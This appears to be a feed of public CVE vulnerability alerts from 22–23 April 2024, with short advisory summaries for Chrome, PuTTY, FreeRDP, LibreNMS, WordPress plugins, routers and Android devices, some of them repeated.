🚨 CVE-2024-3838Inappropriate implementation in Autofill in Google Chrome prior to 124.0.6367.60 allowed an attacker who convinced a user to install a malicious app to perform UI spoofing via a crafted app. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-04-23 18:37:26 |
🚨 CVE-2024-3834Use after free in Downloads in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-04-23 18:37:25 |
🚨 CVE-2024-3832Object corruption in V8 in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-04-23 18:37:24 |
🚨 CVE-2024-31497In PuTTY 0.68 through 0.80 before 0.81, biased ECDSA nonce generation allows an attacker to recover a user's NIST P-521 secret key via a quick attack in approximately 60 signatures. This is especially important in a scenario where an adversary is able to read messages signed by PuTTY or Pageant. The required set of signed messages may be publicly readable because they are stored in a public Git service that supports use of SSH for commit signing, and the signatures were made by Pageant through an agent-forwarding mechanism. In other words, an adversary may already have enough signature information to compromise a victim's private key, even if there is no further use of vulnerable PuTTY versions. After a key compromise, an adversary may be able to conduct supply-chain attacks on software maintained in Git. A second, independent scenario is that the adversary is an operator of an SSH server to which the victim authenticates (for remote login or file copy), even though this server is not fully trusted by the victim, and the victim uses the same private key for SSH connections to other services operated by other entities. Here, the rogue server operator (who would otherwise have no way to determine the victim's private key) can derive the victim's private key, and then use it for unauthorized access to those other services. If the other services include Git services, then again it may be possible to conduct supply-chain attacks on software maintained in Git. This also affects, for example, FileZilla before 3.67.0, WinSCP before 6.3.3, TortoiseGit before 2.15.0.1, and TortoiseSVN through 1.14.6.🎖@cveNotify |
|
| 2024-04-23 17:37:26 |
🚨 CVE-2024-21972An out of bounds write vulnerability in the AMD Radeon™ user mode driver for DirectX® 11 could allow an attacker with access to a malformed shader to potentially achieve arbitrary code execution.🎖@cveNotify |
|
| 2024-04-23 17:37:25 |
🚨 CVE-2024-28130An incorrect type conversion vulnerability exists in the DVPSSoftcopyVOI_PList::createFromImage functionality of OFFIS DCMTK 3.6.8. A specially crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-04-23 16:37:27 |
🚨 CVE-2024-28130An incorrect type conversion vulnerability exists in the DVPSSoftcopyVOI_PList::createFromImage functionality of OFFIS DCMTK 3.6.8. A specially crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-04-23 15:37:59 |
🚨 CVE-2024-33215Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the mitInterface parameter in ip/goform/addressNat.🎖@cveNotify |
|
| 2024-04-23 15:37:58 |
🚨 CVE-2024-33213Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the mitInterface parameter in ip/goform/RouteStatic.🎖@cveNotify |
|
| 2024-04-23 15:37:57 |
🚨 CVE-2024-33212Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the funcpara1 parameter in ip/goform/setcfm.🎖@cveNotify |
|
| 2024-04-23 15:37:54 |
🚨 CVE-2024-33211Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the PPPOEPassword parameter in ip/goform/QuickIndex.🎖@cveNotify |
|
| 2024-04-23 15:37:53 |
🚨 CVE-2024-31804An unquoted service path vulnerability in Terratec DMX_6Fire USB v.1.23.0.02 allows a local attacker to escalate privileges via the Program.exe component.🎖@cveNotify |
|
| 2024-04-23 15:37:52 |
🚨 CVE-2024-29003The SolarWinds Platform was susceptible to a XSS vulnerability that affects the maps section of the user interface. This vulnerability requires authentication and requires user interaction.🎖@cveNotify |
|
| 2024-04-23 14:37:36 |
🚨 CVE-2024-2477The wpDiscuz plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Alternative Text' field of an uploaded image in all versions up to, and including, 7.6.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-23 14:37:33 |
🚨 CVE-2024-28627An issue in Flipsnack v.18/03/2024 allows a local attacker to obtain sensitive information via the reader.gz.js file.🎖@cveNotify |
|
| 2024-04-23 14:37:32 |
🚨 CVE-2023-27199PAX Technology A930 PayDroid_7.1.1_Virgo_V04.5.02_20220722 allows attackers to compile a malicious shared library and use LD_PRELOAD to bypass authorization checks.🎖@cveNotify |
|
| 2024-04-23 14:37:31 |
🚨 CVE-2023-27198PAX A930 device with PayDroid_7.1.1_Virgo_V04.5.02_20220722 can allow the execution of arbitrary commands by using the exec service and including a specific word in the command to be executed. The attacker must have physical USB access to the device in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-04-23 14:37:30 |
🚨 CVE-2023-27197PAX A930 device with PayDroid_7.1.1_Virgo_V04.5.02_20220722 can allow an attacker to gain root access by running a crafted binary leveraging an exported function from a shared library. The attacker must have shell access to the device in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-04-23 14:37:27 |
🚨 CVE-2022-46966Revenue Collection System v1.0 was discovered to contain a SQL injection vulnerability at step1.php.🎖@cveNotify |
|
| 2024-04-23 14:37:26 |
🚨 CVE-2022-26581PAX A930 device with PayDroid_7.1.1_Virgo_V04.3.26T1_20210419 can allow an unauthorized attacker to perform privileged actions through the execution of specific binaries listed in ADB daemon. The attacker must have physical USB access to the device in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-04-23 14:37:25 |
🚨 CVE-2022-26579PAX A930 device with PayDroid_7.1.1_Virgo_V04.3.26T1_20210419 can allow a root privileged attacker to install unsigned packages. The attacker must have shell access to the device and gain root privileges in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-04-23 13:37:44 |
🚨 CVE-2024-3911An unauthenticated remote attacker can deceive users into performing unintended actions due to improper restriction of rendered UI layers or frames.🎖@cveNotify |
|
| 2024-04-23 13:37:43 |
🚨 CVE-2024-26922In the Linux kernel, the following vulnerability has been resolved:drm/amdgpu: validate the parameters of bo mapping operations more clearlyVerify the parameters ofamdgpu_vm_bo_(map/replace_map/clearing_mappings) in one common place.🎖@cveNotify |
|
| 2024-04-23 13:37:42 |
🚨 CVE-2023-47731IBM QRadar Suite Software 1.10.12.0 through 1.10.19.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 272203.🎖@cveNotify |
|
| 2024-04-23 13:07:43 |
🚨 CVE-2024-32656Ant Media Server is live streaming engine software. A local privilege escalation vulnerability in present in versions 2.6.0 through 2.8.2 allows any unprivileged operating system user account to escalate privileges to the root user account on the system. This vulnerability arises from Ant Media Server running with Java Management Extensions (JMX) enabled and authentication disabled on localhost on port 5599/TCP. This vulnerability is nearly identical to the local privilege escalation vulnerability CVE-2023-26269 identified in Apache James. Any unprivileged operating system user can connect to the JMX service running on port 5599/TCP on localhost and leverage the MLet Bean within JMX to load a remote MBean from an attacker-controlled server. This allows an attacker to execute arbitrary code within the Java process run by Ant Media Server and execute code within the context of the `antmedia` service account on the system. Version 2.9.0 contains a patch for the issue. As a workaround, one may remove certain parameters from the `antmedia.service` file.🎖@cveNotify |
|
| 2024-04-23 13:07:42 |
🚨 CVE-2024-32480LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. Versions prior to 24.4.0 are vulnerable to SQL injection. The `order` parameter is obtained from `$request`. After performing a string check, the value is directly incorporated into an SQL statement and concatenated, resulting in a SQL injection vulnerability. An attacker may extract a whole database this way. Version 24.4.0 fixes the issue.🎖@cveNotify |
|
| 2024-04-23 13:07:41 |
🚨 CVE-2024-32479LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. Prior to version 24.4.0, there is improper sanitization on the `Service` template name, which can lead to stored Cross-site Scripting. Version 24.4.0 fixes this vulnerability.🎖@cveNotify |
|
| 2024-04-23 13:07:38 |
🚨 CVE-2024-32461LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A SQL injection vulnerability in POST /search/search=packages in LibreNMS prior to version 24.4.0 allows a user with global read privileges to execute SQL commands via the package parameter. With this vulnerability, an attacker can exploit a SQL injection time based vulnerability to extract all data from the database, such as administrator credentials. Version 24.4.0 contains a patch for the vulnerability.🎖@cveNotify |
|
| 2024-04-23 13:07:37 |
🚨 CVE-2024-32459FreeRDP is a free implementation of the Remote Desktop Protocol. FreeRDP based clients and servers that use a version of FreeRDP prior to 3.5.0 or 2.11.6 are vulnerable to out-of-bounds read. Versions 3.5.0 and 2.11.6 patch the issue. No known workarounds are available.🎖@cveNotify |
|
| 2024-04-23 13:07:36 |
🚨 CVE-2024-32458FreeRDP is a free implementation of the Remote Desktop Protocol. FreeRDP based clients that use a version of FreeRDP prior to 3.5.0 or 2.11.6 are vulnerable to out-of-bounds read. Versions 3.5.0 and 2.11.6 patch the issue. As a workaround, use `/gfx` or `/rfx` modes (on by default, require server side support).🎖@cveNotify |
|
| 2024-04-23 13:07:32 |
🚨 CVE-2024-32041FreeRDP is a free implementation of the Remote Desktop Protocol. FreeRDP based clients that use a version of FreeRDP prior to 3.5.0 or 2.11.6 are vulnerable to out-of-bounds read. Versions 3.5.0 and 2.11.6 patch the issue. As a workaround, deactivate `/gfx` (on by default, set `/bpp` or `/rfx` options instead.🎖@cveNotify |
|
| 2024-04-23 13:07:31 |
🚨 CVE-2024-32039FreeRDP is a free implementation of the Remote Desktop Protocol. FreeRDP based clients using a version of FreeRDP prior to 3.5.0 or 2.11.6 are vulnerable to integer overflow and out-of-bounds write. Versions 3.5.0 and 2.11.6 patch the issue. As a workaround, do not use `/gfx` options (e.g. deactivate with `/bpp:32` or `/rfx` as it is on by default).🎖@cveNotify |
|
| 2024-04-23 13:07:30 |
🚨 CVE-2024-29368An issue discovered in moziloCMS v2.0 allows attackers to bypass file upload restrictions and run arbitrary code by changing the file extension after upload via crafted POST request.🎖@cveNotify |
|
| 2024-04-23 13:07:27 |
🚨 CVE-2024-27574SQL Injection vulnerability in Trainme Academy version Ichin v.1.3.2 allows a remote attacker to obtain sensitive information via the informacion, idcurso, and tit parameters.🎖@cveNotify |
|
| 2024-04-23 13:07:26 |
🚨 CVE-2024-32405Cross Site Scripting vulnerability in inducer relate before v.2024.1 allows a remote attacker to escalate privileges via a crafted payload to the Answer field of InlineMultiQuestion parameter on Exam function.🎖@cveNotify |
|
| 2024-04-23 13:07:25 |
🚨 CVE-2024-32399Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.🎖@cveNotify |
|
| 2024-04-23 13:07:24 |
🚨 CVE-2024-32238H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface.🎖@cveNotify |
|
| 2024-04-23 11:37:24 |
🚨 CVE-2024-3491The Schema & Structured Data for WP & AMP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's "How To" and "FAQ" Blocks in all versions up to, and including, 1.29 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-23 10:37:25 |
🚨 CVE-2024-3732The GeoDirectory – WordPress Business Directory Plugin, or Classified Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gd_single_tabs' shortcode in all versions up to, and including, 2.3.48 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-23 10:37:24 |
🚨 CVE-2024-3665The Rank Math SEO with AI SEO Tools plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's HowTo and FAQ widgets in all versions up to, and including, 1.0.216 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-23 09:37:25 |
🚨 CVE-2024-3185A key used in logging.json does not follow the least privilege principle by default and is exposed to local users in the Rapid7 Platform. This allows an attacker with local access to a machine with the logging.json file to use that key to authenticate to the platform with high privileges. This was fixed in the Rapid7 platform starting 3 April 2024 via the introduction of a restricted role and the removal of automatic API key generation on installation of an agent.🎖@cveNotify |
|
| 2024-04-23 09:37:24 |
🚨 CVE-2024-0900The Elespare – Build Your Blog, News & Magazine Websites with Expert-Designed Template Kits. One Click Import: No Coding Skills Required! plugin for WordPress is vulnerable to unauthorized post creation due to a missing capability check on the elespare_create_post() function hooked via AJAX in all versions up to, and including, 2.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to create arbitrary posts.🎖@cveNotify |
|
| 2024-04-23 08:37:28 |
🚨 CVE-2024-3664The Quick Featured Images plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the set_thumbnail and delete_thumbnail functions in all versions up to, and including, 13.7.0. This makes it possible for authenticated attackers, with contributor-level access and above, to delete thumbnails and add thumbnails to posts they did not author.🎖@cveNotify |
|
| 2024-04-23 08:37:27 |
🚨 CVE-2022-25481ThinkPHP Framework v5.0.24 was discovered to be configured without the PATHINFO parameter. This allows attackers to access all system environment parameters from index.php. NOTE: this is disputed by a third party because system environment exposure is an intended feature of the debugging mode.🎖@cveNotify |
|
| 2024-04-23 07:37:31 |
🚨 CVE-2024-4031Unquoted Search Path or Element vulnerability in Logitech MEVO WEBCAM APP on Windows allows Local Execution of Code.🎖@cveNotify |
|
| 2024-04-23 07:37:30 |
🚨 CVE-2023-48184QuickJS before 7414e5f has a quickjs.h JS_FreeValueRT use-after-free because of incorrect garbage collection of async functions with closures.🎖@cveNotify |
|
| 2024-04-23 07:37:26 |
🚨 CVE-2024-29291An issue in Laravel Framework 8 through 11 might allow a remote attacker to discover database credentials in storage/logs/laravel.log. NOTE: this is disputed by multiple third parties because the owner of a Laravel Framework installation can choose to have debugging logs, but needs to set the access control appropriately for the type of data that may be logged.🎖@cveNotify |
|
| 2024-04-23 07:37:25 |
🚨 CVE-2020-28246A Server-Side Template Injection (SSTI) was discovered in Form.io 2.0.0. This leads to Remote Code Execution during deletion of the default Email template URL. NOTE: the email templating service was removed after 2020.🎖@cveNotify |
|
| 2024-04-23 07:37:24 |
🚨 CVE-2002-20001The Diffie-Hellman Key Agreement Protocol allows remote attackers (from the client side) to send arbitrary numbers that are actually not public keys, and trigger expensive server-side DHE modular-exponentiation calculations, aka a D(HE)at or D(HE)ater attack. The client needs very little CPU resources and network bandwidth. The attack may be more disruptive in cases where a client can require a server to select its largest supported key size. The basic attack scenario is that the client must claim that it can only communicate with DHE, and the server must be configured to allow DHE.🎖@cveNotify |
|
| 2024-04-23 06:37:26 |
🚨 CVE-2024-2799The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Grid & Advanced Text widget HTML tags in all versions up to, and including, 1.3.96 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-23 06:37:25 |
🚨 CVE-2024-2493Session Hijacking vulnerability in Hitachi Ops Center Analyzer.This issue affects Hitachi Ops Center Analyzer: from 10.0.0-00 before 11.0.1-00.🎖@cveNotify |
|
| 2024-04-23 06:37:24 |
🚨 CVE-2023-6833Insertion of Sensitive Information into Log File vulnerability in Hitachi Ops Center Administrator allows local users to gain sensitive information.This issue affects Hitachi Ops Center Administrator: before 11.0.1.🎖@cveNotify |
|
| 2024-04-23 05:37:26 |
🚨 CVE-2024-31857Forminator prior to 1.15.4 contains a cross-site scripting vulnerability. If this vulnerability is exploited, a remote attacker may obtain user information etc. and alter the page contents on the user's web browser.🎖@cveNotify |
|
| 2024-04-23 05:37:25 |
🚨 CVE-2024-28890Forminator prior to 1.29.0 contains an unrestricted upload of file with dangerous type vulnerability. If this vulnerability is exploited, a remote attacker may obtain sensitive information by accessing files on the server, alter the site that uses the plugin, and cause a denial-of-service (DoS) condition.🎖@cveNotify |
|
| 2024-04-23 05:37:24 |
🚨 CVE-2024-21511Versions of the package mysql2 before 3.9.7 are vulnerable to Arbitrary Code Injection due to improper sanitization of the timezone parameter in the readCodeFor function by calling a native MySQL Server date/time function.🎖@cveNotify |
|
| 2024-04-23 04:37:25 |
🚨 CVE-2024-2760Bkav Home v7816, build 2403161130 is vulnerable to a Memory Information Leak vulnerability by triggering the 0x222240 IOCTL code of the BkavSDFlt.sys driver.🎖@cveNotify |
|
| 2024-04-23 04:37:24 |
🚨 CVE-2024-1241Watchdog Antivirus v1.6.415 is vulnerable to a Denial of Service vulnerability by triggering the 0x80002014 IOCTL code of the wsdk-driver.sys driver.🎖@cveNotify |
|
| 2024-04-23 03:37:24 |
🚨 CVE-2023-50471cJSON v1.7.16 was discovered to contain a segmentation violation via the function cJSON_InsertItemInArray at cJSON.c.🎖@cveNotify |
|
| 2024-04-23 02:37:25 |
🚨 CVE-2023-4693An out-of-bounds read flaw was found on grub2's NTFS filesystem driver. This issue may allow a physically present attacker to present a specially crafted NTFS file system image to read arbitrary memory locations. A successful attack allows sensitive data cached in memory or EFI variable values to be leaked, presenting a high Confidentiality risk.🎖@cveNotify |
|
| 2024-04-23 02:37:24 |
🚨 CVE-2023-4692An out-of-bounds write flaw was found in grub2's NTFS filesystem driver. This issue may allow an attacker to present a specially crafted NTFS filesystem image, leading to grub's heap metadata corruption. In some circumstances, the attack may also corrupt the UEFI firmware heap metadata. As a result, arbitrary code execution and secure boot protection bypass may be achieved.🎖@cveNotify |
|
| 2024-04-22 23:37:27 |
🚨 CVE-2024-3177A security issue was discovered in Kubernetes where users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using containers, init containers, and ephemeral containers with the envFrom field populated. The policy ensures pods running with a service account may only reference secrets specified in the service account’s secrets field. Kubernetes clusters are only affected if the ServiceAccount admission plugin and the kubernetes.io/enforce-mountable-secrets annotation are used together with containers, init containers, and ephemeral containers with the envFrom field populated.🎖@cveNotify |
|
| 2024-04-22 23:37:26 |
🚨 CVE-2024-32653jadx is a Dex to Java decompiler. Prior to version 1.5.0, the package name is not filtered before concatenation. This can be exploited to inject arbitrary code into the package name. The vulnerability allows an attacker to execute commands with shell privileges. Version 1.5.0 contains a patch for the vulnerability.🎖@cveNotify |
|
| 2024-04-22 23:37:25 |
🚨 CVE-2024-32480LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. Versions prior to 24.4.0 are vulnerable to SQL injection. The `order` parameter is obtained from `$request`. After performing a string check, the value is directly incorporated into an SQL statement and concatenated, resulting in a SQL injection vulnerability. An attacker may extract a whole database this way. Version 24.4.0 fixes the issue.🎖@cveNotify |
|
| 2024-04-22 22:37:26 |
🚨 CVE-2024-32461LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A SQL injection vulnerability in POST /search/search=packages in LibreNMS prior to version 24.4.0 allows a user with global read privileges to execute SQL commands via the package parameter. With this vulnerability, an attacker can exploit a SQL injection time based vulnerability to extract all data from the database, such as administrator credentials. Version 24.4.0 contains a patch for the vulnerability.🎖@cveNotify |
|
| 2024-04-22 22:37:25 |
🚨 CVE-2024-32459FreeRDP is a free implementation of the Remote Desktop Protocol. FreeRDP based clients and servers that use a version of FreeRDP prior to 3.5.0 or 2.11.6 are vulnerable to out-of-bounds read. Versions 3.5.0 and 2.11.6 patch the issue. No known workarounds are available.🎖@cveNotify |
|
| 2024-04-22 22:37:24 |
🚨 CVE-2024-31036A heap-buffer-overflow vulnerability in the read_byte function in NanoMQ v.0.21.7 allows attackers to cause a denial of service via transmission of crafted hexstreams.🎖@cveNotify |
|
| 2024-04-22 21:37:32 |
🚨 CVE-2024-32041FreeRDP is a free implementation of the Remote Desktop Protocol. FreeRDP based clients that use a version of FreeRDP prior to 3.5.0 or 2.11.6 are vulnerable to out-of-bounds read. Versions 3.5.0 and 2.11.6 patch the issue. As a workaround, deactivate `/gfx` (on by default, set `/bpp` or `/rfx` options instead.🎖@cveNotify |
|
| 2024-04-22 21:37:31 |
🚨 CVE-2024-32040FreeRDP is a free implementation of the Remote Desktop Protocol. FreeRDP based clients that use a version of FreeRDP prior to 3.5.0 or 2.11.6 and have connections to servers using the `NSC` codec are vulnerable to integer underflow. Versions 3.5.0 and 2.11.6 patch the issue. As a workaround, do not use the NSC codec (e.g. use `-nsc`).🎖@cveNotify |
|
| 2024-04-22 21:37:28 |
🚨 CVE-2024-32039FreeRDP is a free implementation of the Remote Desktop Protocol. FreeRDP based clients using a version of FreeRDP prior to 3.5.0 or 2.11.6 are vulnerable to integer overflow and out-of-bounds write. Versions 3.5.0 and 2.11.6 patch the issue. As a workaround, do not use `/gfx` options (e.g. deactivate with `/bpp:32` or `/rfx` as it is on by default).🎖@cveNotify |
|
| 2024-04-22 21:37:27 |
🚨 CVE-2024-4040VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.🎖@cveNotify |
|
| 2024-04-22 21:37:26 |
🚨 CVE-2023-33584Sourcecodester Enrollment System Project V1.0 is vulnerable to SQL Injection (SQLI) attacks, which allow an attacker to manipulate the SQL queries executed by the application. The application fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code.🎖@cveNotify |
|
| 2024-04-22 19:37:45 |
🚨 CVE-2023-38300A certain software build for the Orbic Maui device (Orbic/RC545L/RC545L:10/ORB545L_V1.4.2_BVZPP/230106:user/release-keys) leaks the IMEI and the ICCID to system properties that can be accessed by any local app on the device without any permissions or special privileges. Google restricted third-party apps from directly obtaining non-resettable device identifiers in Android 10 and higher, but in this instance they are leaked by a high-privilege process and can be obtained indirectly. This malicious app reads from the "persist.sys.verizon_test_plan_imei" system property to indirectly obtain the IMEI and reads the "persist.sys.verizon_test_plan_iccid" system property to obtain the ICCID.🎖@cveNotify |
|
| 2024-04-22 19:37:44 |
🚨 CVE-2023-38299Various software builds for the AT&T Calypso, Nokia C100, Nokia C200, and BLU View 3 devices leak the device IMEI to a system property that can be accessed by any local app on the device without any permissions or special privileges. Google restricted third-party apps from directly obtaining non-resettable device identifiers in Android 10 and higher, but in these instances they are leaked by a high-privilege process and can be obtained indirectly. The software build fingerprints for each confirmed vulnerable device are as follows: AT&T Calypso (ATT/U318AA/U318AA:10/QP1A.190711.020/1632369780:user/release-keys); Nokia C100 (Nokia/DrakeLite_02US/DKT:12/SP1A.210812.016/02US_1_190:user/release-keys and Nokia/DrakeLite_02US/DKT:12/SP1A.210812.016/02US_1_270:user/release-keys); Nokia C200 (Nokia/Drake_02US/DRK:12/SP1A.210812.016/02US_1_080:user/release-keys); and BLU View 3 (BLU/B140DL/B140DL:11/RP1A.200720.011/1628014629:user/release-keys, BLU/B140DL/B140DL:11/RP1A.200720.011/1632535579:user/release-keys, BLU/B140DL/B140DL:11/RP1A.200720.011/1637325978:user/release-keys, BLU/B140DL/B140DL:11/RP1A.200720.011/1650073052:user/release-keys, BLU/B140DL/B140DL:11/RP1A.200720.011/1657087912:user/release-keys, BLU/B140DL/B140DL:11/RP1A.200720.011/1666316280:user/release-keys, and BLU/B140DL/B140DL:11/RP1A.200720.011/1672371162:user/release-keys). This malicious app reads from the "persist.sys.imei1" system property to indirectly obtain the device IMEI.🎖@cveNotify |
|
| 2024-04-22 19:37:43 |
🚨 CVE-2023-38297An issue was discovered in a third-party com.factory.mmigroup component, shipped on devices from multiple device manufacturers. Certain software builds for various Android devices contain a vulnerable pre-installed app with a package name of com.factory.mmigroup (versionCode='3', versionName='2.1) that allows local third-party apps to perform various actions, due to inadequate access control, in its context (system user), but the functionalities exposed depend on the specific device. The following capabilities are exposed to zero-permission, third-party apps on the following devices: arbitrary AT command execution via AT command injection (T-Mobile Revvl 6 Pro 5G, T-Mobile Revvl V+ 5G, and Boost Mobile Celero 5G); programmatic factory reset (Samsung Galaxy A03S, T-Mobile Revvl 6 Pro 5G, T-Mobile Revvl V+ 5G, Boost Mobile Celero, Realme C25Y, and Lenovo Tab M8 HD), leaking IMEI (Samsung Galaxy A03S, T-Mobile Revvl 6 Pro 5G, T-Mobile Revvl V+ 5G, Boost Mobile Celero, and Realme C25Y); leaking serial number (Samsung Galaxy A03s, T-Mobile Revvl 6 Pro 5G, T-Mobile Revvl V+ 5G, Boost Mobile Celero, Realme C25Y, and Lenovo Tab M8 HD); powering off the device (Realme C25Y, Samsung Galaxy A03S, and T-Mobile Revvl 6 Pro 5G); and programmatically enabling/disabling airplane mode (Samsung Galaxy A03S, T-Mobile Revvl 6 Pro 5G, T-Mobile Revvl V+ 5G, Boost Mobile Celero, and Realme C25Y); and enabling Wi-Fi, Bluetooth, and GPS (Samsung Galaxy A03S, T-Mobile Revvl 6 Pro 5G, T-Mobile Revvl V+ 5G, Boost Mobile Celero, and Realme C25Y). No permissions or special privileges are necessary to exploit the vulnerabilities in the com.factory.mmigroup app. No user interaction is required beyond installing and running a third-party app. The software build fingerprints for each confirmed vulnerable device are as follows: Boost Mobile Celero 5G (Celero5G/Jupiter/Jupiter:11/RP1A.200720.011/SW_S98119AA1_V067:user/release-keys, Celero5G/Jupiter/Jupiter:11/RP1A.200720.011/SW_S98119AA1_V064:user/release-keys, Celero5G/Jupiter/Jupiter:11/RP1A.200720.011/SW_S98119AA1_V061:user/release-keys, and Celero5G/Jupiter/Jupiter:11/RP1A.200720.011/SW_S98119AA1_V052:user/release-keys); Samsung Galaxy A03S (samsung/a03sutfn/a03su:13/TP1A.220624.014/S134DLUDU6CWB6:user/release-keys and samsung/a03sutfn/a03su:12/SP1A.210812.016/S134DLUDS5BWA1:user/release-keys); Lenovo Tab M8 HD (Lenovo/LenovoTB-8505F/8505F:10/QP1A.190711.020/S300637_220706_BMP:user/release-keys and Lenovo/LenovoTB-8505F/8505F:10/QP1A.190711.020/S300448_220114_BMP:user/release-keys); T-Mobile Revvl 6 Pro 5G (T-Mobile/Augusta/Augusta:12/SP1A.210812.016/SW_S98121AA1_V070:user/release-keys and T-Mobile/Augusta/Augusta:12/SP1A.210812.016/SW_S98121AA1_V066:user/release-keys); T-Mobile Revvl V+ 5G (T-Mobile/Sprout/Sprout:11/RP1A.200720.011/SW_S98115AA1_V077:user/release-keys and T-Mobile/Sprout/Sprout:11/RP1A.200720.011/SW_S98115AA1_V060:user/release-keys); and Realme C25Y (realme/RMX3269/RED8F6:11/RP1A.201005.001/1675861640000:user/release-keys, realme/RMX3269/RED8F6:11/RP1A.201005.001/1664031768000:user/release-keys, realme/RMX3269/RED8F6:11/RP1A.201005.001/1652814687000:user/release-keys, and realme/RMX3269/RED8F6:11/RP1A.201005.001/1635785712000:user/release-keys). This malicious app sends a broadcast Intent to com.factory.mmigroup/.MMIGroupReceiver. This causes the com.factory.mmigroup app to dynamically register for various action strings. The malicious app can then send these strings, allowing it to perform various behaviors that the com.factory.mmigroup app exposes. The actual behaviors exposed by the com.factory.mmigroup app depend on device model and chipset. The com.factory.mmigroup app executes as the "system" user, allowing it to interact with the baseband processor and perform various other sensitive actions.🎖@cveNotify |
|
| 2024-04-22 19:37:42 |
🚨 CVE-2023-38296Various software builds for the following TCL 30Z and TCL A3X devices leak the ICCID to a system property that can be accessed by any local app on the device without any permissions or special privileges. Google restricted third-party apps from directly obtaining non-resettable device identifiers in Android 10 and higher, but in these instances they are leaked by a high-privilege process and can be obtained indirectly. The software build fingerprints for each confirmed vulnerable device are as follows: TCL 30Z (TCL/4188R/Jetta_ATT:12/SP1A.210812.016/LV8E:user/release-keys, TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU5P:user/release-keys, TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU61:user/release-keys, TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU66:user/release-keys, TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU68:user/release-keys, TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU6P:user/release-keys, and TCL/T602DL/Jetta_TF:12/SP1A.210812.016/vU6X:user/release-keys) and TCL A3X (TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vAAZ:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vAB3:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vAB7:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vABA:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vABM:user/release-keys, TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vABP:user/release-keys, and TCL/A600DL/Delhi_TF:11/RKQ1.201202.002/vABS:user/release-keys). This malicious app reads from the "persist.sys.tctPowerIccid" system property to indirectly obtain the ICCID.🎖@cveNotify |
|
| 2024-04-22 19:37:38 |
